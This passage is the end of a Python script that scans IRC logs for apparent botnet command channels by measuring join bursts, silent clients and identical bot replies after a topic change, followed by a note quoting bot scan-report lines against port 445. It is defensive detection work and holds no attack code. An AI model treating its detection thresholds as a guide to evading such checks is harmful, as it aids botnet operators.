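        msgs = [(t, n, normalise(x)) for t, n, _, e, x in evs if e == "PRIVMSG"]
        talkers = {n for _, n, _ in msgs}
        silent = len(clients - talkers) / len(clients) if clients else 0.0
        echo = 0.0
        for t0, _, _, e, _ in evs:
            if e != "TOPIC" or not clients:
                continue
            replies = defaultdict(set)        # normalised reply text -> replying clients
            for t, n, norm in msgs:
                if t0 < t <= t0 + echo_window and n in clients:
                    replies[norm].add(n)
            if replies:
                echo = max(echo, max(len(s) for s in replies.values()) / len(clients))
        report[chan] = {"clients": len(clients), "join_burst": burst,
                        "silent_ratio": round(silent, 2), "echo_ratio": round(echo, 2)}
    return report


def suspicious_channels(report, min_burst=20, min_echo=0.5, min_silent=0.8, min_clients=10):
    """Channels that trip any of the three heuristics (thresholds are assumptions)."""
    hits = []
    for chan, m in report.items():
        if (m["join_burst"] >= min_burst or m["echo_ratio"] >= min_echo
                or (m["silent_ratio"] >= min_silent and m["clients"] >= min_clients)):
            hits.append(chan)
    return sorted(hits)


if __name__ == "__main__":
    rep = analyse(build_sample_log())
    for chan, m in rep.items():
        print(chan, m)
    print("suspicious:", suspicious_channels(rep))
```

    The echo check is the one that survives herders who throttle joins: bots that report "[SCAN]: ... started on 10.3.x.x:445" and "[SCAN]: ... started on 10.17.x.x:445" differ only in digits, so collapsing digits before comparing makes forty such replies count as one identical answer. Real deployments would feed this from IRC reassembled by the IDS on any port, not just 6667, as the notes point out.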